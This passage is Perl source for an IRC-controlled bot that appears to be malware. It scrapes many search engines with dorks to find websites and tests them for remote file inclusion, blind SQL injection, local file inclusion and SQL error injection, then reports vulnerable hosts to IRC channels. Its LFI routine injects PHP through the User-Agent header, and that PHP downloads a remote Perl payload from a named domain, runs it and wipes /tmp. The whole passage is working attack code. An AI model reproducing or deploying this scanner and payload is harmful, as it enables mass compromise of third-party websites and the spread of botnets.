/Bing/) { my @Bing=&Bing($dork, $bsqlon); push(@total, @Bing); } if ($engz =~ /ALtaViSTa/) { my @altavista=&altavista($dork, $bsqlon); push(@total, @altavista); }

if ($engz =~ /AsK/) { my @ask=&ask($dork, $bsqlon); push(@total, @ask); } if ($engz =~ /UoL/) { my @uol=&uol($dork, $bsqlon); push(@total, @uol); } if ($engz =~ /LyCos/) { my @lycos=&lycos($dork, $bsqlon); push(@total, @lycos); } if ($engz =~ /YahOo/) { my @yahoo=&yahoo($dork, $bsqlon); push(@total, @yahoo); } if ($engz =~ /Biglobe/) { my @biglobe=&biglobe($dork, $bsqlon); push(@total, @biglobe); } if ($engz =~ /Seznam/) { my @seznam=&seznam($dork, $bsqlon); push(@total, @seznam); } if ($engz =~ /Sapo/) { my @sapo=&sapo($dork, $bsqlon); push(@total, @sapo); } if ($engz =~ /Hotbot/) { my @hotbot=&hotbot($dork, $bsqlon); push(@total, @hotbot); } my @clean=&calculate(@total); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2RFI15) (3@2$engz15)12 Total:12 (".scalar(@total).")12 Clean:12 (".scalar(@clean).")"); if (scalar(@clean) != 0) { sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2RFI15) (3@2$engz15)3 Exploiting12 $dork"); } my $uni=scalar(@clean); foreach my $target (@clean) { $contatore++; if ($contatore==$uni-1){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2RFI15) (3@2$engz15)10 Scan Finish for14 $dork");

} my $xpl = "http://".$target.$bugz.$injector."?"; my $vuln = "http://".$target."12".$bugz."3".$phpshell."?"; my $re = getcontent($xpl); if($re =~ /$rfi_result/ && $re =~ /uid=/){ os($xpl); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2RFI15) (3@2$engz15)15(13@12Vulnerable15)12 ".$vuln." 15(3@6".$os."15) (3@3SAFEMODE-OFF15)"); } elsif($re =~ /$rfi_result/) { os($xpl); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2RFI15) (3@2$engz15)15(13@12Vulnerable15)12 ".$vuln." 15(3@6".$os."15) (3@12SAFEMODE-ON15)"); } } } sub sqlscan() { my $engz = $_[0]; my $dork = $_[1]; my $bsqlon = 1; my $contatore = 0; if ($engz =~ /GooGLe/) { my @google=&google($dork, $bsqlon); push(@total, @google); } # if ($engz =~ /AllTheWeb/) { # my @alltheweb=&alltheweb($dork, $bsqlon); # push(@total, @alltheweb); # } if ($engz =~ /Bing/) { my @Bing=&Bing($dork, $bsqlon); push(@total, @Bing); } # if ($engz =~ /ALtaViSTa/) { # my @altavista=&altavista($dork, $bsqlon); # push(@total, @altavista); # } if ($engz =~ /AsK/) { my @ask=&ask($dork, $bsqlon); push(@total, @ask); } if ($engz =~ /UoL/) {

my @uol=&uol($dork, $bsqlon); push(@total, @uol); } if ($engz =~ /LyCos/) { my @lycos=&lycos($dork, $bsqlon); push(@total, @lycos); } if ($engz =~ /YahOo/) { my @yahoo=&yahoo($dork, $bsqlon); push(@total, @yahoo); } if ($engz =~ /Biglobe/) { my @biglobe=&biglobe($dork, $bsqlon); push(@total, @biglobe); } if ($engz =~ /Seznam/) { my @seznam=&seznam($dork, $bsqlon); push(@total, @seznam); } if ($engz =~ /Sapo/) { my @sapo=&sapo($dork, $bsqlon); push(@total, @sapo); } if ($engz =~ /Hotbot/) { my @hotbot=&hotbot($dork, $bsqlon); push(@total, @hotbot); } my @clean=&calculate(@total); @clean=&serv_iguais(@clean); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2SQL15) (3@2$engz15)12 Total:12 (".scalar(@total).")12 Clean:12 (".scalar(@clean).")"); if (scalar(@clean) != 0) { sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2SQL15) (3@2$engz15)3 Exploiting12 $dork"); } my $uni=scalar(@clean); foreach my $target (@clean) { $contatore++; if ($contatore==$uni-1){ sendraw($IRC_cur_socket, "PRIVMSG $result_channel : 15(3@2SQL15)(3@2$engz15)10 Scan Finish for14 $dork"); } if (($target =~ m/\=.*/g) && ($target !~ m/google\.com/)) { my $next = 1; my $xpl = "http://".$target;

my $url = $xpl; my $url2 = $xpl; my $url3 = $xpl; $url =~ s/\=(.*)\&/\=$1\/\*\*\/And\/\*\*\/(SELECT\/\*\*\/1)\=1\&/g; $url =~ s/\=(.*)$/\=$1\/\*\*\/And\/\*\*\/(SELECT\/\*\*\/1)\=1/g; $url2 =~ s/\=(.*)\&/\=$1\/\*\*\/And\/\*\*\/(SELECT\/\*\*\/2)\=2\&/g; $url2 =~ s/\=(.*)$/\=$1\/\*\*\/And\/\*\*\/(SELECT\/\*\*\/2)\=2/g; $url3 =~ s/\=(.*)\&/\=$1\/\*\*\/And\/\*\*\/(SELECT\/\*\*\/1)\=2\&/g; $url3 =~ s/\=(.*)$/\=$1\/\*\*\/And\/\*\*\/(SELECT\/\*\*\/1)\=2/g; my $r1 = getcontent($url); my $r2 = getcontent($url2); my $r3 = getcontent($url3); my $tam1 = length($r1); my $tam2 = length($r2); my $tam3 = length($r3); my $subcerto = $tam2 - $tam1; my $suberrado = $tam3 - $tam1; my $re = getcontent($xpl); if ((($subcerto >= -10) && ($subcerto <= 10)) && (($suberrado <= -10) || ($suberrado >= 10))) { #sendraw($IRC_cur_socket, "PRIVMSG $result_channel_cmd : $xpl -- $url"); sendraw($IRC_cur_socket, "PRIVMSG $result_channel : 15(3@2SQL15)(3@2$engz15)15(13@12Vulnerable15)12 ".$xpl." 15(3Tipo: 6Integer15)"); $next = 0; } if ( $next ) { $url = $xpl; $url2 = $xpl; $url3 = $xpl; $url =~ s/\=(.*)\&/\=$1\'\/\*\*\/And\/\*\*\/(SELECT\/\*\*\/1)\=\'1\&/g; $url =~ s/\=(.*)$/\=$1\'\/\*\*\/And\/\*\*\/(SELECT\/\*\*\/1)\=\'1/g; $url2 =~ s/\=(.*)\&/\=$1\'\/\*\*\/And\/\*\*\/(SELECT\/\*\*\/2)\=\'2\&/g; $url2 =~ s/\=(.*)$/\=$1\'\/\*\*\/And\/\*\*\/(SELECT\/\*\*\/2)\=\'2/g;

$url3 =~ s/\=(.*)\&/\=$1\'\/\*\*\/And\/\*\*\/(SELECT\/\*\*\/1)\=\'2\&/g; $url3 =~ s/\=(.*)$/\=$1\'\/\*\*\/And\/\*\*\/(SELECT\/\*\*\/1)\=\'2/g; my $r1 = getcontent($url); my $r2 = getcontent($url2); my $r3 = getcontent($url3); my $tam1 = length($r1); my $tam2 = length($r2); my $tam3 = length($r3); my $subcerto = $tam2 - $tam1; my $suberrado = $tam3 - $tam1; my $re = getcontent($xpl); if ((($subcerto >= -10) && ($subcerto <= 10)) && (($suberrado <= -10) || ($suberrado >= 10))) { #sendraw($IRC_cur_socket, "PRIVMSG $result_channel_cmd : $xpl -- $url"); sendraw($IRC_cur_socket, "PRIVMSG $result_channel : 15(3@2SQL15)(3@2$engz15)15(13@12Vulnerable15)12 ".$xpl." 15(3Tipo: 6String15)"); } } } } } sub lfiscan() { my $engz = $_[0]; my $bugz = $_[1]; my $dork = $_[2]; my $bsqlon = 0; my $contatore = 0; if (substr($bugz, 0, 1) eq "/") { $bugz = substr($bugz, 1); } my $direc = $bugz; $direc =~ m/.+(\/.+)/; my $b = $1; if ($b ne "") { $direc = str_replace($b, "", $direc);

$direc .= "/"; } else { $direc = ""; } if ($direc eq "/") { $direc = ""; } if ($engz =~ /GooGLe/) { my @google=&google($dork, $bsqlon); push(@total, @google); } if ($engz =~ /AllTheWeb/) { my @alltheweb=&alltheweb($dork, $bsqlon); push(@total, @alltheweb); } if ($engz =~ /Bing/) { my @Bing=&Bing($dork, $bsqlon); push(@total, @Bing); } if ($engz =~ /ALtaViSTa/) { my @altavista=&altavista($dork, $bsqlon); push(@total, @altavista); } if ($engz =~ /AsK/) { my @ask=&ask($dork, $bsqlon); push(@total, @ask); } if ($engz =~ /UoL/) { my @uol=&uol($dork, $bsqlon); push(@total, @uol); } if ($engz =~ /LyCos/) { my @lycos=&lycos($dork, $bsqlon); push(@total, @lycos); } if ($engz =~ /YahOo/) { my @yahoo=&yahoo($dork, $bsqlon); push(@total, @yahoo); } if ($engz =~ /Biglobe/) { my @biglobe=&biglobe($dork, $bsqlon); push(@total, @biglobe); } if ($engz =~ /Seznam/) { my @seznam=&seznam($dork, $bsqlon); push(@total, @seznam); }

if ($engz =~ /Sapo/) { my @sapo=&sapo($dork, $bsqlon); push(@total, @sapo); } if ($engz =~ /Hotbot/) { my @hotbot=&hotbot($dork, $bsqlon); push(@total, @hotbot); } my @clean = &calculate(@total); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2LFI15) (3@2$engz15)12 Total:12 (".scalar(@total).")12 Clean:12 (".scalar(@clean).")"); if (scalar(@clean) != 0) { sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2LFI15) (3@2$engz15)3 Exploiting12 $dork"); } my $uni=scalar(@clean); foreach my $target (@clean) { $contatore++; if ($contatore==$uni-1){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2LFI15) (3@2$engz15)10 Scan Finish for14 $dork"); } my $xpl = "http://".$target.$bugz.$lfi_test; my $vuln = "http://".$target."12".$bugz."3".$lfi_test.""; my $re = getcontent24($xpl, "<? echo('h4ug'.'uen'); ?>oi"); if ($re =~ /h4uguen/){ sendraw($IRC_cur_socket, "PRIVMSG $result_channel : 15(3@2LFI15)(3@2$engz15)15(13@12Vulnerable15)12 ".$vuln." 15(3@3LOSTSOULS15)"); my $nada = getcontent($loger.urlencode("$xpl")); my $re2 = getcontent24($xpl, "<? system('GET $lficmdsite > $lficmdname; wget $lficmdsite -O $lficmdname; curl -o $lficmdsite $lficmdname;cd /tmp; GET http://colmarie-torfou.net/joomlascol15/libraries/pear/beer.txt > /tmp/somez.datz ; lynx -source http://colmarie-torfou.net/joomlascol15/libraries/pear/beer.txt > /tmp/somez.date ; wget http://colmarie-torfou.net/joomlascol15/libraries/pear/beer.txt; curl -O http://colmarie-torfou.net/joomlascol15/libraries/pear/beer.txt;lwp-download http://colmarie-torfou.net/joomlascol15/libraries/pear/beer.txt;perl beer.txt; perl /tmp/somez.dat ; perl /tmp/somez.date ; perl /tmp/somez.datz;perl beer.txt; rm /tmp/*'); ? oi"); my $sitec99 = "http://".limpa($target).$direc.$lficmdname; my $c99 = getcontent($sitec99); #sendraw($IRC_cur_socket, "PRIVMSG hauguen :limpa($target) $direc $lficmdname"); if ($c99 =~ m/$lficmdresult/) { sendraw($IRC_cur_socket, "PRIVMSG

$result_channel_cmd :15(3@2LFI15)(3@2$engz15)15(13@12Vulnerable15)12 ". $sitec99." 15(3@3LOSTSOULS15)"); } } } } sub mysqlscan() { my $engz = $_[0]; my $bugz = $_[1]; my $dork = $_[2]; my $bsqlon = 0; my $contatore = 0; if ($engz =~ /GooGLe/) { my @google=&google($dork, $bsqlon); push(@total, @google); } if ($engz =~ /AllTheWeb/) { my @alltheweb=&alltheweb($dork, $bsqlon); push(@total, @alltheweb); } if ($engz =~ /Bing/) { my @Bing=&Bing($dork, $bsqlon); push(@total, @Bing); } if ($engz =~ /ALtaViSTa/) { my @altavista=&altavista($dork, $bsqlon); push(@total, @altavista); } if ($engz =~ /AsK/) { my @ask=&ask($dork, $bsqlon); push(@total, @ask); } if ($engz =~ /UoL/) { my @uol=&uol($dork, $bsqlon); push(@total, @uol); } if ($engz =~ /LyCos/) { my @lycos=&lycos($dork, $bsqlon); push(@total, @lycos); } if ($engz =~ /YahOo/) { my @yahoo=&yahoo($dork, $bsqlon); push(@total, @yahoo); } if ($engz =~ /Biglobe/) {

my @biglobe=&biglobe($dork, $bsqlon); push(@total, @biglobe); } if ($engz =~ /Seznam/) { my @seznam=&seznam($dork, $bsqlon); push(@total, @seznam); } if ($engz =~ /Sapo/) { my @sapo=&sapo($dork, $bsqlon); push(@total, @sapo); } if ($engz =~ /Hotbot/) { my @hotbot=&hotbot($dork, $bsqlon); push(@total, @hotbot); } my @clean = &calculate(@total); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2SQL15) (3@2$engz15)12 Total:12 (".scalar(@total).")12 Clean:12 (".scalar(@clean).")"); if (scalar(@clean) != 0) { sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2SQL15) (3@2$engz15)3 Exploiting12 $dork"); } my $uni = scalar(@clean); foreach my $target (@clean) { $contatore++; if ($contatore==$uni-1){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2SQL15) (3@2$engz15)10 Scan Finish for14 $dork"); } my $xpl = "http://".$target.$bugz.$sql_test; my $vuln = "http://".$target."12".$bugz."3[SQL]"; my $re = getcontent($xpl); if ($re =~ /$mysql_output/){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2SQL15) (3@2$engz15)15(13@12ErrorQuery15)12 ".$vuln." 15(3@3LOSTSOULS15)"); } } } sub mssqlscan() { my $engz = $_[0]; my $bugz = $_[1]; my $dork = $_[2]; my $bsqlon = 0;

my $contatore = 0; if ($engz =~ /GooGLe/) { my @google=&google($dork, $bsqlon); push(@total, @google); } if ($engz =~ /AllTheWeb/) { my @alltheweb=&alltheweb($dork, $bsqlon); push(@total, @alltheweb); } if ($engz =~ /Bing/) { my @Bing=&Bing($dork, $bsqlon); push(@total, @Bing); } if ($engz =~ /ALtaViSTa/) { my @altavista=&altavista($dork, $bsqlon); push(@total, @altavista); } if ($engz =~ /AsK/) { my @ask=&ask($dork, $bsqlon); push(@total, @ask); } if ($engz =~ /UoL/) { my @uol=&uol($dork, $bsqlon); push(@total, @uol); } if ($engz =~ /LyCos/) { my @lycos=&lycos($dork, $bsqlon); push(@total, @lycos); } if ($engz =~ /Biglobe/) { my @biglobe=&biglobe($dork, $bsqlon); push(@total, @biglobe); } if ($engz =~ /Seznam/) { my @seznam=&seznam($dork, $bsqlon); push(@total, @seznam); } my @clean = &calculate(@total); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2SQL15) (3@2$engz15)12 Total:12 (".scalar(@total).")12 Clean:12 (".scalar(@clean).")"); if (scalar(@clean) != 0) { sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2SQL15) (3@2$engz15)3 Exploiting12 $dork"); } my $uni = scalar(@clean); foreach my $target (@clean)

{ $contatore++; if ($contatore==$uni-1){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2SQL15) (3@2$engz15)10 Scan Finish for14 $dork"); } my $xpl = "http://".$target.$bugz.$sql_test; my $vuln = "http://".$target."12".$bugz."3[SQL]"; my $re = getcontent($xpl); if ($re =~ /$mssql_output/){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2SQL15) (3@2$engz15)15(13@12ErrorQuery15)12 ".$vuln." 15(3@3LOSTSOULS15)"); } } } sub os() { my $site = $_[0]; my $re = &query($site); while ($re =~ m/<br>os:(.+?)<br>/g) { $os = $1; if ($1 eq "") { $os = "UnKn0wN"; } } } sub response() { my $re = getcontent($injector); if ($re =~ /pZLNd8MwEITvg/) { sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2RFI15)12 3OK12 "); } else { sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2RFI15)12 12JAH12 "); } } sub getcontent() { $url = $_[0]; my $req = HTTP::Request->new(GET => $url); my $ua = LWP::UserAgent->new(); $ua->timeout(5); my $response = $ua->request($req); return $response->content; } sub getcontent24() { $url = $_[0]; $agent = $_[1];

my $req = HTTP::Request->new(GET => $url); my $ua = LWP::UserAgent->new(); $ua->agent($agent); $ua->timeout(5); my $response = $ua->request($req); return $response->content; } sub urlencode { my $theURL = $_[0]; $theURL =~ s/([\W])/"%" . uc(sprintf("%2.2x",ord($1)))/eg; return $theURL; } sub urldecode { my $theURL = $_[0]; $theURL =~ tr/+/ /; $theURL =~ s/%([a-fA-F0-9]{2,2})/chr(hex($1))/eg; $theURL =~ s/<!--(.|\n)*-->//g; return $theURL; } sub google(){ my @lst; my $key = $_[0]; my $bs = $_[1]; my $bs = $_[1]; my $b = 0; for ($b=0; $b<=1000; $b+=100){ my $Go=("http://www.google.com/search? q=".&key($key)."&num=100&filter=0&start=".$b); my $Res= query($Go); while ($Res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g){ if ($1 !~ /google/){ my $k=$1; my @grep=links($k, $bs); push(@lst,@grep); } } } return @lst; } #sub alltheweb() { # my @lst; # my $key = $_[0]; my $bs = $_[1]; # my $b = 0; # my $pg = 0;

# for ($b=0; $b<=1000; $b+=100) { # my $all = ("http://www.alltheweb.com/search? cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$b); # my $Res = query($all); # while ( $Res =~ m/<span\sclass=\"resTitle\"><a\sclass=\"res\"\shref=\"http:\/\/av\.rds\.yahoo\.com(. +?)\*\*http%3[a|A]\/\/(.+?)\"/g ) { # my $k = $2; # my @grep = links($k, $bs); # push( @lst, @grep ); # } # } # return @lst; #} sub uol() { my @lst; my $key = $_[0]; my $bs = $_[1]; my $b = 0; for ($b=0; $b<=1000; $b+=10) { my $UoL = ("http://busca.uol.com.br/web/?ref=homeuol&q=".key($key)."&start=". $b); my $Res = query($UoL); if ($Res =~ m/retornou nenhum resultado/i) {$b=500;} while ( $Res =~ m/href=\"?http:\/\/([^\">]*)\"/g) { my $k = $1; if ($k !~ /uol\.com\.br|\/web/i){ my @grep = links($k, $bs); push( @lst, @grep ); } } } return @lst; } sub Bing() { my @lst; my $key = $_[0]; my $bs = $_[1]; my $b = 0; for ($b=1; $b<=1000; $b+=10) { my $bing = ("http://www.bing.com/search?q=".&key($key)."&filt=all&first=". $b."&FORM=PERE"); my $Res = query($bing); while ( $Res =~ m/<div\sclass=\"sb_tlst\"><h3><a\shref=\"http:\/\/(.+?)\"/g ) { if ( $1 !~ /msn|live|bing/ ) { my $k = $1;

my @grep = links($k, $bs); push( @lst, @grep ); } } } return @lst; } sub seznam() { my @lst; my $key = $_[0]; my $bs = $_[1]; my $b = 0; for ($b=1; $b<=300; $b+=20) { my $seznam = ("http://search.seznam.cz/?q=".&key($key)."&count=20&from=".$b); my $Res = query($seznam); while ( $Res =~ m/href=\"?http:\/\/([^\">]*)\"/g) { if ( $1 !~ /seznam\.cz|chytrevyhledavani\.cz|smobil\.cz|sklik\.cz/i) { my $k = $1; my @grep = links($k, $bs); push( @lst, @grep ); } } } return @lst; } sub biglobe() { my @lst; my $key = $_[0]; my $bs = $_[1]; my $b = 0; for ($b=1; $b<=500; $b+=10) { $num += $num; my $biglobe = ("http://cgi.search.biglobe.ne.jp/cgi-bin/search-st_lp2?start=". $b."&ie=utf8&num=".$num."&q=".&key($key)."&lr=all"); my $Res = query($biglobe); while ( $Res =~ m/<a href=\"http:\/\/(.+?)\"/g ) { if ( $1 !~ /biglobe/) { my $k = $1; my @grep = links($k, $bs); push( @lst, @grep ); } } } return @lst; }

sub sapo() { my @lst; my $key = $_[0]; my $bs = $_[1]; my $b = 0; for ($b=1; $b<=50; $b+=1) { my $sapo = ("http://pesquisa.sapo.pt/? barra=resumo&cluster=0&format=html&limit=10&location=pt&page=". $b."&q=".&key($key)."&st=local"); my $Res = query($sapo); if ($Res !~ m/Next/i) {$b=50;} while ( $Res =~ m/<a href=\"http:\/\/(.*?)\"/g) { if ( $1 !~ /\.sapo\.pt/) { my $k = $1; my @grep = links($k, $bs); push( @lst, @grep ); } } } return @lst; } sub hotbot() { my @lst; my $key = $_[0]; my $bs = $_[1]; my $b = 0; for ($b=1; $b<=50; $b+=1) { my $hotbot = ("http://www.hotbot.com/search/web?pn=".$b."&q=".&key($key)); my $Res = query($hotbot); if ($Res !~ m/had no web result/i) {$b=50;} while ( $Res =~ m/href=\"http:\/\/(.+?)\" title=/g) { if ( $1 !~ /hotbot\.com/) { my $k = $1; my @grep = links($k, $bs); push( @lst, @grep ); } } } return @lst; } #sub altavista(){ # my @lst; # my $key = $_[0]; my $bs = $_[1]; # my $b = 0; # for ($b=1; $b<=1000; $b+=10){ # my $AlT=("http://it.altavista.com/web/results?

itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b); # my $Res=query($AlT); # while ($Res=~m/<a\sclass=\'res\'\shref=\'http:\/\/av\.rds\.yahoo\.com(.+?)\*\*http\ %3a\/\/(.+?)\'/g){ # if ($1 !~ /altavista/){ # my $k=$2; # my @grep=links($k, $bs); # push(@lst,@grep); # } # } # } #return @lst; #} sub ask() { my @lst; my $key = $_[0]; my $bs = $_[1]; my $b = 0; my $pg = 0; for ($b=1; $b<=1000; $b+=100) { my $Ask = ("http://uk.ask.com/web? q=".key($key)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4 D30795&page=".$b."&jss="); my $Res = query($Ask); while ($Res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { if ($1 !~ /ask\.com/){ my $k = $1; my @grep = links($k, $bs); push( @lst, @grep ); } } } return @lst; } sub lycos() { my @lst; my $key = $_[0]; my $bs = $_[1]; my $b = 0; for ($b=0; $b<=50; $b+=1) { my $lyc = ("http://search.lycos.com/web?q=".key($key)."&pn=".$b); my $Res = query($lyc); while ($Res =~ m/title=\"http:\/\/(.*?)\"/g) { if ($1 !~ /lycos\.com/){ my $k = $1; my @grep = links($k, $bs);

push(@lst, @grep); } } } return @lst; } sub yahoo() { my @lst; my $key = $_[0]; my $bs = $_[1]; my $b = 0; for ($b=1; $b<=1000; $b+=10) { my $yahoo = ("http://search.yahoo.com/search?p=".&key($key)."&b=".$b); my $Res = query($yahoo); while ($Res =~ m/http\%3a\/\/(.+?)\"/g) { if ($1 !~ /yahoo\.com/){ my $k = $2; my @grep = links($k, $bs); push(@lst, @grep); } } } return @lst; } sub links() { my @l; my $link = $_[0]; $link =~ s/\&amp\;/\&/g; $link = urldecode($link); if ( !$_[1] ) { my $host = $link; my $hdir = $link; $hdir =~ s/(.*)\/[^\/]*$/\1/; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $host .= "/"; $link .= "/"; $hdir .= "/"; $host =~ s/\/\//\//g; $hdir =~ s/\/\//\//g; $link =~ s/\/\//\//g; push( @l, $host, $hdir ); } push( @l, $link ); return @l; }

sub key() { my $dork = $_[0]; $dork =~ s/ /\+/g; $dork =~ s/:/\%3A/g; $dork =~ s/\//\%2F/g; $dork =~ s/&/\%26/g; $dork =~ s/\"/\%22/g; $dork =~ s/,/\%2C/g; $dork =~ s/\\/\%5C/g; $dork =~ s/\n//g; $dork =~ s/\r//g; $dork =~ s/\t//g; return $dork; } sub limpa() { my $site = $_[0]; if ($site =~ m/\.php/) { $site =~ s/\.php.*//g; $site =~ m/.+(\/.+)/; my $b = $1; $site =~ s/$b//g; $site .= "/"; } $site =~ s/\/\?option.+//g; $site .= "/"; $site =~ s/\?component.+//g; $site =~ s/\/component\/option.+//g; $site .= "/"; $site =~ s/\/\//\//g; $site =~ s/\/\//\//g; return $site; } sub str_replace { my $replace_this = shift; my $with_this = shift; my $string = shift; my $length = length($string); my $target = length($replace_this); for(my $i=0; $i<$length - $target + 1; $i++) {

if(substr($string,$i,$target) eq $replace_this) { $string = substr($string,0,$i) . $with_this . substr($string,$i+$target); return $string; #Comment this if you what a global replace } } return $string; } sub query($) { my $url = $_[0]; $url =~ s/http:\/\///; my $host = $url; my $query = $url; my $page = ""; $host =~ s/href=\"?http:\/\///; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $query =~ s/$host//; if ( $query eq "" ) { $query = "/"; } eval { my $sock = IO::Socket::INET->new(PeerAddr => "$host", PeerPort => "80", Proto => "tcp") or return; print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; my @r = <$sock>; $page = "@r"; close($sock); }; return $page; } sub query2($) { my $url = $_[0]; $url =~ s/http:\/\///; my $host = $url; my $query = $url; my $page = ""; $host =~ s/href=\"?http:\/\///; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $query =~ s/$host//; if ( $query eq "" ) { $query = "/"; } eval { my $sock = IO::Socket::INET->new(PeerAddr => "$host", PeerPort => "80", Proto => "tcp") or return; print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341

Safari/528.16\r\n\r\n"; my @r = <$sock>; $page = "@r"; close($sock); }; return $page; } #User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16

sub calculate { my @calculate = (); my %visti = (); foreach my $element (@_) { $element =~ s/\/+/\//g; next if $visti{$element}++; push @calculate, $element; } return @calculate; } sub serv_iguais { #by hauguen my @calculate = (); my %visti = (); my $treko; my $verisign; foreach my $element (@_) { $element =~ s/\/+/\//g; $treko = $element; $treko =~ m/^(.+?)\=/; $verisign = $1; next if $visti{$verisign}++; push @calculate, $element; } return @calculate; } sub nick { return unless $#_ == 0; sendraw("NICK $_[0]"); } sub notice {

return unless $#_ == 1; sendraw("NOTICE $_[0] :$_[1]"); }

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